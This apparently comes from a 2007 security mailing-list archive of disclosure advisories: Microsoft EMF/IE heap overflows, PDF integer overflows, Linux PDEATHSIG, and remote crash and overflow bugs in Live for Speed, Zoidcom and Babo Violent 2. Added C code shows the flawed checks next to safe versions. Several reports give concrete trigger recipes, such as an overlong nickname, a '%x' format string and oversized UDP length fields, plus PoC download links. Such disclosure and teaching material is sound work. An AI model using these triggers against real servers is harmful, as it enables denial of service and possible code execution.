77F4B56D  mov  edi, [ebx]      ; pointer to start of buffer
77F4B56F  mov  ecx, esi
77F4B574  add  edi, eax        ; now EDI points to unused buffer space
 ...
77F4B5BA  mov  eax, ecx
77F4B5BC  shr  ecx, 2
77F4B5BF  rep movsd            ; *** complete heap overwrite ***

By constructing a metafile containing an extremely large record length,
a complete heap overwrite may occur, due to the intrinsic memcpy
attempting to copy roughly 4GB of arbitrary data into a heap block.
Because of the size of the copy, an access violation is inevitable, but
in programs (such as Microsoft Office applications) that attempt to
handle the exception, successful exploitation has been demonstrated.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink Endpoint Vulnerability Prevention preemptively protects from this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability.  The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS07-046.mspx

Credit:
Yuji Ukai

Related Links:
Retina - Network Security Scanner - Free Trial:
http://www.eeye.com/html/products/retina/download/index.html
Blink - Unified Client Security Personal - Free For Home Use:
http://www.eeye.com/html/products/blink/personal/download/index.html
Blink - Unified Client Security Professional - Free Trial:
http://www.eeye.com/html/products/blink/download/index.html

Greetings:
fourteenforty.jp

Copyright (c) 1998-2007 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the use
or spread of this information.  Any use of this information is at the
user's own risk.
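
Both eEye advisories above come down to a bounds check performed with arithmetic that can wrap: AttemptWrite adds a user-controlled record size to the bytes already used and compares the (possibly wrapped) sum with the capacity, and CDownloadSink::OnDataAvailable subtracts the buffered uncompressed length from the raw byte count and can underflow to roughly 4 GB. The following C model is added here to put each faulty check beside a form that cannot wrap. It is not Microsoft's code; the function names, the 32-bit types and the sample values are this example's assumptions.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * Model of the AttemptWrite check: 32-bit 'used + size' compared against the
 * buffer capacity, the LEA/CMP pair the advisory marks as the overflow.
 * Returns 1 if the check admits the copy.
 */
int attemptwrite_check_naive(uint32_t capacity, uint32_t used, uint32_t size)
{
    uint32_t end = used + size;     /* wraps when used + size >= 2^32 */
    return end <= capacity;         /* a wrapped 'end' looks small and passes */
}

/* Same decision without an addition that can wrap. */
int attemptwrite_check_safe(uint32_t capacity, uint32_t used, uint32_t size)
{
    if (used > capacity) return 0;
    return size <= capacity - used;
}

/* 1 if the naive check lets through a record that does not actually fit. */
int attemptwrite_would_overflow(uint32_t capacity, uint32_t used, uint32_t size)
{
    uint64_t real_end = (uint64_t)used + size;   /* exact, no wrap */
    return attemptwrite_check_naive(capacity, used, size) && real_end > capacity;
}

/*
 * Model of the VGX read limit: total raw (compressed) bytes received so far
 * minus the uncompressed bytes already in the buffer. As soon as the data
 * inflates, the subtraction underflows to a value close to 4 GB.
 */
uint32_t vgx_read_limit_naive(uint32_t raw_total, uint32_t uncompressed_buffered)
{
    return raw_total - uncompressed_buffered;
}

/* The limit the copy actually has to respect: the unused space in the buffer. */
uint32_t vgx_read_limit_safe(uint32_t buffer_capacity, uint32_t buffer_used)
{
    return buffer_used > buffer_capacity ? 0 : buffer_capacity - buffer_used;
}

int main(void)
{
    /* constructed values: a 4 KiB heap block with 16 bytes used, and a record
     * header claiming 0xFFFFFFF8 bytes */
    printf("naive check admits 0xFFFFFFF8-byte record: %d\n",
           attemptwrite_check_naive(0x1000, 0x10, 0xFFFFFFF8));
    printf("safe  check admits it:                     %d\n",
           attemptwrite_check_safe(0x1000, 0x10, 0xFFFFFFF8));
    /* constructed values: 1000 compressed bytes that inflated to 3000 */
    printf("naive read limit: 0x%08x\n", vgx_read_limit_naive(1000, 3000));
    printf("safe  read limit: %u\n", vgx_read_limit_safe(4096, 3000));
    return 0;
}
```

The safe variants never form `a + b` or `a - b` on attacker-influenced operands before comparing; they rearrange the inequality so the only subtraction is between two values already known to be ordered.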


FLEA-2007-0044-1 tetex tetex-dvips tetex-fonts

2007-08-14 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0044-1
Published: 2007-08-14

Rating: Major

Updated Versions:
tetex=/[EMAIL PROTECTED]:devel//1/2.0.2-28.7-1[desktop is: x86]
tetex-dvips=/[EMAIL PROTECTED]:devel//1/2.0.2-28.7-1[desktop is: x86]
tetex-fonts=/[EMAIL PROTECTED]:devel//1/2.0.2-28.7-1[desktop is: x86]
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.8-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387
https://issues.foresightlinux.org/browse/FL-471
https://issues.rpath.com/browse/RPL-1596
https://issues.rpath.com/browse/RPL-1604

Description:
Previous versions of the tetex package are vulnerable to an int overflow in
included xpdf code, which can be exploited via a specially-crafted PDF file
to execute arbitrary code.

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html


Multiple vulnerabilities in Live for Speed 0.5X10

2007-08-14 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Live for Speed
  http://www.lfs.net
Versions:     <= 0.5X10
Platforms:Windows
Bugs: A] nickname buffer-overflow
  B] partial track buffer-overflow
  C] NULL pointer access in internet/hidden S1/S2 servers
  D] memcpy() NULL pointer in internet/hidden S1/S2 servers
Exploitation: remote, versus server
  A] demo/S1/S2 in-game
  B] demo/S1/S2 in-game
  C] S1/S2 (internet/hidden)
  D] S1/S2 (internet/hidden)
Date: 14 Aug 2007
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


Live for Speed (LFS) is one of the best known car racing simulators,
since it lets you do a lot of things: races, autocross, drifting, drag
races and parking too.


###

===
2) Bugs
===

---
A] nickname buffer-overflow
---

A buffer-overflow vulnerability is located in the portion of code which
handles the client's nickname from packets with ID 3.
This packet must contain the following NULL terminated strings:

  24 bytes for the nickname
   8 bytes for the car's plate
  16 bytes for other data
  16 bytes for the helmet

To exploit the bug it's enough to set a nickname longer than its intended
size, overwriting the fields that follow it in the packet.



B] partial track buffer-overflow


Another buffer-overflow is exploitable through the packets with ID 10,
but this time it doesn't seem possible to use it for executing remote
code because the return address is overwritten by a fixed string of the
server.

In short, when the user requests a track which is not available on the
host, the server calls:

  sprintf(buff, "%s is not enabled on this host", client_track);

using a destination buffer big enough to prevent control of the return
address but not big enough to avoid a crash.


---
C] NULL pointer access in internet/hidden S1/S2 servers
---

The S1 and S2 servers which run in internet mode (so visible on the master
server) or hidden mode are vulnerable to a crash caused by the access to
a NULL pointer.
The problem is exploitable through a packet containing a 0x00 byte at
data offset 23 of the pre-login packet with ID 3.
Demo and LAN servers are not vulnerable.


-
D] memcpy() NULL pointer in internet/hidden S1/S2 servers
-

The S1 and S2 servers which run in internet mode (so visible on the master
server) or hidden mode are vulnerable to a crash caused by a call to
memcpy() with a NULL source (in reality it's NULL + 12).
The problem seems to be caused by the absence of one or more required
strings in the pre-login packet with ID 5.
Demo and LAN servers are not vulnerable.


In summary:
Bugs A and B are in-game, so the attacker must have access to the
server, i.e. know its password if it's protected and not be banned.
Bugs C and D instead work against any server except demo and LAN servers
and are not in-game, so any attacker can crash any server, password
protected or not.


###

===
3) The Code
===


With the following tool bugs A and B can be tested, but only against the
demo server:

http://aluigi.org/fakep/lfsfp.zip


###

==
4) Fix
==


The only thing that the developers have been able to tell me is that
the bugs will be fixed in Patch Y (yes, I asked for a release date
but they don't know it)... that's really stupid, since a quick fix would
have been the best choice, especially considering the auto-patching
system of the game.


###


--- 
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org
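
As an added example (not from Luigi's advisory or from the LFS code), the following C parser reads the four NUL-terminated fields the advisory lists for the ID 3 packet with each field bounded by its declared size, so an overlong nickname is rejected instead of spilling over the plate, other-data and helmet fields the way a plain strcpy() would let it. The advisory does not give the packet framing; the single leading packet-ID byte, the builder used to produce test packets and the sample field values are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Field sizes given in the advisory for the ID 3 packet. */
#define LFS_NICK_LEN   24
#define LFS_PLATE_LEN   8
#define LFS_OTHER_LEN  16
#define LFS_HELMET_LEN 16

struct lfs_join {
    char nick[LFS_NICK_LEN];
    char plate[LFS_PLATE_LEN];
    char other[LFS_OTHER_LEN];
    char helmet[LFS_HELMET_LEN];
};

/* Copy one NUL-terminated field into a buffer of `cap` bytes. Unlike strcpy(),
 * the NUL must appear within the destination's capacity and within the packet;
 * otherwise the field is rejected. Returns 0 on success, -1 on failure. */
static int read_field(const uint8_t *pkt, size_t n, size_t *pos, char *dst, size_t cap)
{
    size_t avail = n - *pos;
    size_t window = avail < cap ? avail : cap;
    const uint8_t *nul = memchr(pkt + *pos, 0, window);
    if (!nul) return -1;                         /* overlong or truncated field */
    size_t len = (size_t)(nul - (pkt + *pos));
    memcpy(dst, pkt + *pos, len + 1);            /* len + 1 <= cap by construction */
    *pos += len + 1;
    return 0;
}

/* Assumed layout (not stated in the advisory): one packet-ID byte (3), then
 * the four strings back to back. Returns 0 on success, -1 on a malformed packet. */
int lfs_parse_join(const uint8_t *pkt, size_t n, struct lfs_join *out)
{
    if (n < 1 || pkt[0] != 3) return -1;
    size_t pos = 1;
    memset(out, 0, sizeof *out);
    if (read_field(pkt, n, &pos, out->nick,   sizeof out->nick))   return -1;
    if (read_field(pkt, n, &pos, out->plate,  sizeof out->plate))  return -1;
    if (read_field(pkt, n, &pos, out->other,  sizeof out->other))  return -1;
    if (read_field(pkt, n, &pos, out->helmet, sizeof out->helmet)) return -1;
    return 0;
}

/* Serialise four strings with no per-field limits, i.e. what a hostile client
 * is free to send. Returns the packet length, or 0 if it does not fit in `cap`. */
size_t lfs_build_join(uint8_t *buf, size_t cap, const char *nick,
                      const char *plate, const char *other, const char *helmet)
{
    const char *fields[4] = { nick, plate, other, helmet };
    size_t pos = 0;
    if (cap == 0) return 0;
    buf[pos++] = 3;
    for (int i = 0; i < 4; i++) {
        size_t len = strlen(fields[i]) + 1;      /* include the NUL */
        if (len > cap - pos) return 0;
        memcpy(buf + pos, fields[i], len);
        pos += len;
    }
    return pos;
}

/* 1 if an ordinary join packet (constructed values) parses back into its fields. */
int lfs_demo_valid(void)
{
    uint8_t pkt[128];
    struct lfs_join j;
    size_t n = lfs_build_join(pkt, sizeof pkt, "racer1", "LFS-001", "other", "helmet");
    return n > 0 && lfs_parse_join(pkt, n, &j) == 0 &&
           strcmp(j.nick, "racer1") == 0 && strcmp(j.plate, "LFS-001") == 0 &&
           strcmp(j.helmet, "helmet") == 0;
}

/* 1 if a 40-byte nickname (the bug A trigger) is rejected rather than copied
 * across the plate, other and helmet fields. */
int lfs_demo_overlong_nick(void)
{
    uint8_t pkt[128];
    struct lfs_join j;
    size_t n = lfs_build_join(pkt, sizeof pkt,
                              "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "PL", "x", "h");
    return n > 0 && lfs_parse_join(pkt, n, &j) == -1;
}

int main(void)
{
    printf("valid packet parses:        %d\n", lfs_demo_valid());
    printf("overlong nickname rejected: %d\n", lfs_demo_overlong_nick());
    return 0;
}
```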


Re: COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

2007-08-14 Thread Dan Yefimov
On Tue, 14 Aug 2007, Wojciech Purczynski wrote:

 
  I'm not sure this is a real security issue. If some process has the same
  effective UID as the given one, the former can always send any signal to
  the latter. Thus the behaviour you described is IMHO normal.
 
 It becomes a security issue whenever suid process drops user's UIDs.
 
But if it drops privileges (changes EUID back to RUID), it can't again send any 
signal to the setuid process.
-- 

Sincerely Your, Dan.



FLEA-2007-0045-1 poppler

2007-08-14 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0045-1
Published: 2007-08-14

Rating: Major

Updated Versions:
poppler=/[EMAIL PROTECTED]:1-devel//1/0.5.9-2-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.8-2

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387
https://issues.foresightlinux.org/browse/FL-471
https://issues.rpath.com/browse/RPL-1596
https://issues.rpath.com/browse/RPL-1604 

Description:
Previous versions of the poppler package are vulnerable to an int overflow
in included xpdf code, which can be exploited via a specially-crafted PDF
file to execute arbitrary code. 

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGwhD8Wu/kq4lN9jkRAvHNAJ9iYd8RqwK0Ye4cW1h2GN5BbpMzKwCfYtpE
2s2b1KnweHoHWxA+FgW0II4=
=1+kr
-END PGP SIGNATURE-


Re: COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

2007-08-14 Thread Wojciech Purczynski

Small correction - I forgot to add setuid(0) ;)

PARENT  CHILD

fork()
prctl(PR_SET_PDEATHSIG)
execve(/bin/setuid-binary)
setuid(0)
exit()'ed or killed
child receives NO signal this time


PARENT  CHILD

fork()
prctl(PR_SET_PDEATHSIG)
execve(/bin/setuid-binary)
setuid(0)
execve(/bin/setuid-binary)
exit()'ed or killed
privileged process receives the signal


Crash in Zoidcom 0.6.7

2007-08-14 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Zoidcom
  http://www.zoidcom.com
Versions:     <= 0.6.7 (some older versions may not be vulnerable)
Platforms:Windows, Linux and Mac
Bug:  crash
Exploitation: remote
Date: 14 Aug 2007
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


Zoidcom is an interesting network library designed for minimal bandwidth
usage.


###

==
2) Bug
==


The library can be crashed remotely through a malformed connection
packet which forces the code to perform a double-delete of the data
used for tracking the connection.


###

===
3) The Code
===


http://aluigi.org/poc/zoidboom2.zip


###

==
4) Fix
==


The bug will be fixed in version 0.6.8.


###


--- 
Luigi Auriemma
http://aluigi.org
http://mirror.aluigi.org


rPSA-2007-0160-1 openoffice.org

2007-08-14 Thread rPath Update Announcements
rPath Security Advisory: 2007-0160-1
Published: 2007-08-14
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
openoffice.org=/[EMAIL PROTECTED]:devel//1/2.2-0.2-1

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0245
https://issues.rpath.com/browse/RPL-1570

Description:
Previous versions of the openoffice.org package are vulnerable to an
arbitrary code execution attack in which an attacker can use a
maliciously crafted RTF document to cause a heap-based buffer overflow.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


[ MDKSA-2007:163 ] - Updated koffice packages fix vulnerability

2007-08-14 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:163
 http://www.mandriva.com/security/
 ___
 
 Package : koffice
 Date: August 14, 2007
 Affected: 2007.0, 2007.1
 ___
 
 Problem Description:
 
 Maurycy Prodeus found an integer overflow vulnerability in the way
 various PDF viewers processed PDF files.  An attacker could create
 a malicious PDF file that could cause koffice to crash and possibly
 execute arbitrary code upon a user opening the file.
 
 This update provides packages which are patched to prevent these
 issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3387
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 0b913eb2132d4a550927ffdc0259f8e6  
2007.0/i586/koffice-1.5.91-3.4mdv2007.0.i586.rpm
 33b068ca9bb2d6b6cdd4596daa391b9a  
2007.0/i586/koffice-karbon-1.5.91-3.4mdv2007.0.i586.rpm
 46a13862635271e6c3a6f13c059201b7  
2007.0/i586/koffice-kexi-1.5.91-3.4mdv2007.0.i586.rpm
 f6d04fa68ff9ea999df9420fc06f2e34  
2007.0/i586/koffice-kformula-1.5.91-3.4mdv2007.0.i586.rpm
 eeb21b221f83332b0d46743e30e61f95  
2007.0/i586/koffice-kivio-1.5.91-3.4mdv2007.0.i586.rpm
 5429f59c86897e21daeb8285c97eda54  
2007.0/i586/koffice-koshell-1.5.91-3.4mdv2007.0.i586.rpm
 2cf9fddf6034ed595a106c8d202d5de4  
2007.0/i586/koffice-kplato-1.5.91-3.4mdv2007.0.i586.rpm
 e64b16a3ff9402cf114d07819284fec2  
2007.0/i586/koffice-kpresenter-1.5.91-3.4mdv2007.0.i586.rpm
 0904aca8893c7024e29f36b51dc6eda6  
2007.0/i586/koffice-krita-1.5.91-3.4mdv2007.0.i586.rpm
 25072496ee296b2d07fb738a0b35dfe0  
2007.0/i586/koffice-kspread-1.5.91-3.4mdv2007.0.i586.rpm
 8e0d340112c9966b3c6f9ebf186de7b5  
2007.0/i586/koffice-kugar-1.5.91-3.4mdv2007.0.i586.rpm
 cfebda2be2a38427c869c4697c05d731  
2007.0/i586/koffice-kword-1.5.91-3.4mdv2007.0.i586.rpm
 97de592601422a50fa2991f36f2c6129  
2007.0/i586/koffice-progs-1.5.91-3.4mdv2007.0.i586.rpm
 219a7c8e8300712eb6b724170c782178  
2007.0/i586/libkoffice2-karbon-1.5.91-3.4mdv2007.0.i586.rpm
 38e20d8fe50a2ddff1f8884753bae636  
2007.0/i586/libkoffice2-karbon-devel-1.5.91-3.4mdv2007.0.i586.rpm
 65684b7931997775755d6f0ab05ec9b2  
2007.0/i586/libkoffice2-kexi-1.5.91-3.4mdv2007.0.i586.rpm
 2d5df64a8c2e2bb7f87fbd3fabc8abd0  
2007.0/i586/libkoffice2-kexi-devel-1.5.91-3.4mdv2007.0.i586.rpm
 109ed727361c634563aea2da5c9f  
2007.0/i586/libkoffice2-kformula-1.5.91-3.4mdv2007.0.i586.rpm
 4addc1aba792567db820377933c52d5c  
2007.0/i586/libkoffice2-kformula-devel-1.5.91-3.4mdv2007.0.i586.rpm
 28f6f837a65060576a8cd3f34fdab450  
2007.0/i586/libkoffice2-kivio-1.5.91-3.4mdv2007.0.i586.rpm
 f6c7ee5a0ac6c561ad896d144f518079  
2007.0/i586/libkoffice2-kivio-devel-1.5.91-3.4mdv2007.0.i586.rpm
 d242c28b1fb76cc0b6aaff39c097c992  
2007.0/i586/libkoffice2-koshell-1.5.91-3.4mdv2007.0.i586.rpm
 6f0a2dfafc0fe6ea20b792c4d07c715b  
2007.0/i586/libkoffice2-kplato-1.5.91-3.4mdv2007.0.i586.rpm
 68de6a5338f3b12eed36c9e7ed9e674b  
2007.0/i586/libkoffice2-kpresenter-1.5.91-3.4mdv2007.0.i586.rpm
 786ed715665216f2bf0791009e4336d8  
2007.0/i586/libkoffice2-kpresenter-devel-1.5.91-3.4mdv2007.0.i586.rpm
 24bd6de8ca946408d3a9ca6d818c20fc  
2007.0/i586/libkoffice2-krita-1.5.91-3.4mdv2007.0.i586.rpm
 0f886e9495d228a80364b4a329fc21f5  
2007.0/i586/libkoffice2-krita-devel-1.5.91-3.4mdv2007.0.i586.rpm
 e0fad36ced48b93346b9719d95e5772e  
2007.0/i586/libkoffice2-kspread-1.5.91-3.4mdv2007.0.i586.rpm
 81821d0ce7c9fbf9284a99eedac32ba4  
2007.0/i586/libkoffice2-kspread-devel-1.5.91-3.4mdv2007.0.i586.rpm
 73bf37973e8bac224335bdb4b8ffb6b0  
2007.0/i586/libkoffice2-kugar-1.5.91-3.4mdv2007.0.i586.rpm
 c990ba6daf142774d79f08fa37b9e519  
2007.0/i586/libkoffice2-kugar-devel-1.5.91-3.4mdv2007.0.i586.rpm
 9fd4c1ddb79561fcc2a628761bc58b59  
2007.0/i586/libkoffice2-kword-1.5.91-3.4mdv2007.0.i586.rpm
 625ab40c0b52acb12537ad4e54601f3a  
2007.0/i586/libkoffice2-kword-devel-1.5.91-3.4mdv2007.0.i586.rpm
 e5b36cd2cdfda939be530878a20b5e17  
2007.0/i586/libkoffice2-progs-1.5.91-3.4mdv2007.0.i586.rpm
 4325bc6081491592c8702bd10c5f80e6  
2007.0/i586/libkoffice2-progs-devel-1.5.91-3.4mdv2007.0.i586.rpm 
 6d9829b5d53b02fb0c840beea7b807c4  
2007.0/SRPMS/koffice-1.5.91-3.4mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 0558f3f2c7e3184683f7a057035f7d55  
2007.0/x86_64/koffice-1.5.91-3.4mdv2007.0.x86_64.rpm
 cbc7c57476b41aa115308d92a7f5c944  
2007.0/x86_64/koffice-karbon-1.5.91-3.4mdv2007.0.x86_64.rpm
 b2550c0d21ab49fb00b951337e38b75d  
2007.0/x86_64/koffice-kexi-1.5.91-3.4mdv2007.0.x86_64.rpm
 2733627f37bddc7a26ba60970b052a68  
2007.0/x86_64/koffice-kformula-1.5.91-3.4mdv2007.0.x86_64.rpm
 fa0450f5d4ad768d4aa1e3197cf4b6e1  

ZDI-07-048: Microsoft Internet Explorer substringData() Heap Overflow Vulnerability

2007-08-14 Thread zdi-disclosures
ZDI-07-048: Microsoft Internet Explorer substringData() Heap Overflow
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-07-048.html
August 14, 2007

-- CVE ID:
CVE-2007-2223
CVE-2007-2224

-- Affected Vendor:
Microsoft

-- Affected Products:
Windows 2000
Windows XP
Windows Server 2003
Windows Vista
Windows Office 2003
Visual Basic 6.0

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since February  8, 2007 by Digital Vaccine protection
filter ID 5098. For further product information on the TippingPoint IPS:

http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of various Microsoft software. User interaction
is required to exploit this vulnerability in that the target must visit
a malicious page.

The specific flaw exists in the substringData() method available on the
TextNode JavaScript object. When specific parameters are passed to the
method, an integer overflow occurs causing incorrect memory allocation.
If this event occurs after a different ActiveX object has been
instantiated, an exploitable condition is created when the ActiveX
object is deallocated which can result in the execution of arbitrary
code.

-- Vendor Response:
Microsoft has issued updates to correct this vulnerability. More details
can be found at:

http://www.microsoft.com/technet/security/bulletin/ms07-042.mspx
http://www.microsoft.com/technet/security/bulletin/ms07-043.mspx

-- Disclosure Timeline:
2006.10.03 - Vulnerability reported to vendor
2007.02.08 - Digital Vaccine released to TippingPoint customers
2007.08.14 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any 
recipient is prohibited.  If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at [EMAIL PROTECTED] 


Multiple vulnerabilities in Babo Violent 2 2.08.00

2007-08-14 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Babo Violent 2
  http://www.rndlabs.ca
  http://baboviolent.net
Versions: <= 2.08.00
Platforms:Windows and Linux
Bugs: A] crash through malformed value
  B] format string
  C] crash through nonexistent map
  D] crash through malformed UDP packet
Exploitation: A, B and C versus server (both dedicated and game)
  D versus both clients and server
Date: 14 Aug 2007
Author:   Luigi Auriemma
  e-mail: [EMAIL PROTECTED]
  web:aluigi.org


###


1) Introduction
2) Bugs
3) The Code
4) Fix


###

===
1) Introduction
===


Babo Violent 2 is a famous free multiplayer game developed by RndLabs
(now under bitHeads).


###

===
2) Bugs
===


A] crash through malformed value


The data with ID 0xca, 0xcb, 0xcc, 0xce, 0xcf and 0xd0 have a first
byte which, if set to a value greater than or equal to 0x28 (this number
can change), causes the program to crash.
In my tests it doesn't seem possible to use this bug for executing remote
code, although some registers change their values depending on the data
that follows this byte.



B] format string


The output function used by the server is vulnerable to a format string
bug exploitable through chat messages and the admin login.
An easy way to test the problem is to send a message containing %x.


---
C] crash through nonexistent map
---

If the client specifies a map which is not available, the server
terminates due to the exception (stream != NULL).
What the server does is call fopen() with the value passed by the
client plus the .bvm extension in the map folder (note that if the
filename is not NUL-terminated there will be many garbage bytes before
the extension).
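As an added example, not code from the advisory or from the game: a bounded and validated construction of the map path, so that an unterminated or hostile client value is rejected before fopen() is reached and a missing map is reported instead of tripping the assertion. The folder name, the 256-byte path limit and the accepted character set are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define BV2_MAP_DIR "maps"   /* assumed folder name; advisory says only "the map folder" */

/* Builds "<dir>/<name>.bvm" from the raw client field.  The field may not be
 * NUL-terminated (the advisory's "garbage bytes"), so it is bounded by its
 * length, and only plain map-name characters are accepted, which keeps '/',
 * '\\' and ".." out of the path.  Returns false on any rejection. */
bool bv2_build_map_path(const char *field, size_t field_len,
                        char *out, size_t out_size)
{
    size_t n = 0;
    while (n < field_len && field[n] != '\0')   /* bounded strlen */
        n++;
    if (n == 0)
        return false;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)field[i];
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '_' || c == '-';
        if (!ok)
            return false;
    }
    int w = snprintf(out, out_size, BV2_MAP_DIR "/%.*s.bvm", (int)n, field);
    return w > 0 && (size_t)w < out_size;
}

/* Opens the map or returns NULL; the caller reports the error to the client
 * instead of reaching the (stream != NULL) assertion the advisory describes. */
FILE *bv2_open_map(const char *field, size_t field_len)
{
    char path[256];
    if (!bv2_build_map_path(field, field_len, path, sizeof path))
        return NULL;
    return fopen(path, "rb");
}

/* Demo wrapper: returns the built path, or "" when the name was rejected. */
static char bv2_path_buf[256];

const char *bv2_demo_path(const char *field, size_t field_len)
{
    if (!bv2_build_map_path(field, field_len, bv2_path_buf, sizeof bv2_path_buf))
        bv2_path_buf[0] = '\0';
    return bv2_path_buf;
}
```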


-
D] crash through malformed UDP packet
-

Both the servers and the clients open another port other than 
which is 1, this port is used for LAN queries and by clients.
In short, each UDP packet carries a 16-bit number which specifies
the size of the data in the packet.
It's enough to send a small UDP packet with a big 16-bit value to
force the program (client or server) to read outside the packet's
memory, causing a crash:

  memcpy(buffer_of_65536, packet + 9, *(uint16_t *)(packet + 7));

Note that all the IP addresses of the clients are visible in the
server through the playerlist command, so an attacker can decide to
kick only the players he wants, all of them, or just the entire
server.
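As an added example, not from the advisory or from the game's code: the check the memcpy above lacks, validating the declared 16-bit size against the number of bytes actually received before anything is copied. The offsets (7 and 9) come from the advisory; the little-endian byte order and the sample datagrams are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Offsets from the advisory: 16-bit size at offset 7, data at offset 9. */
#define BV2_LEN_OFFSET  7
#define BV2_DATA_OFFSET 9

static uint8_t buffer_of_65536[65536];

/* Size field as the program reads it; little-endian is an assumption. */
static size_t bv2_declared_len(const uint8_t *packet)
{
    return (size_t)packet[BV2_LEN_OFFSET] |
           ((size_t)packet[BV2_LEN_OFFSET + 1] << 8);
}

/* Hardened replacement for the unchecked memcpy: the payload is copied only
 * when the declared size is backed by bytes actually received (the
 * recvfrom() return value) and fits the destination.  Returns the number of
 * bytes copied, or -1 having copied nothing. */
int bv2_copy_payload(const uint8_t *packet, size_t received,
                     uint8_t *out, size_t out_size)
{
    if (packet == NULL || received < BV2_DATA_OFFSET)
        return -1;                          /* datagram shorter than the header */
    size_t declared  = bv2_declared_len(packet);
    size_t available = received - BV2_DATA_OFFSET;
    if (declared > available || declared > out_size)
        return -1;                          /* the advisory's crash case */
    memcpy(out, packet + BV2_DATA_OFFSET, declared);
    return (int)declared;
}

/* Constructed sample datagrams: 7 header bytes, the size field, 4 data bytes. */
static const uint8_t bv2_pkt_ok[]  = {0,0,0,0,0,0,0, 0x04,0x00, 'a','b','c','d'};
static const uint8_t bv2_pkt_bad[] = {0,0,0,0,0,0,0, 0xff,0xff, 'a','b','c','d'};

int bv2_demo_ok(void)   /* 4: declared size matches the bytes present */
{
    return bv2_copy_payload(bv2_pkt_ok, sizeof bv2_pkt_ok,
                            buffer_of_65536, sizeof buffer_of_65536);
}

int bv2_demo_bad(void)  /* -1: 0xffff bytes claimed, only 4 received */
{
    return bv2_copy_payload(bv2_pkt_bad, sizeof bv2_pkt_bad,
                            buffer_of_65536, sizeof buffer_of_65536);
}
```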


Note: the password protection in servers doesn't seem to work very well,
which is why these in-game bugs can sometimes be exploited also on
protected servers without knowing the needed keyword: it's enough to
reconnect if the connection closes... and be lucky.
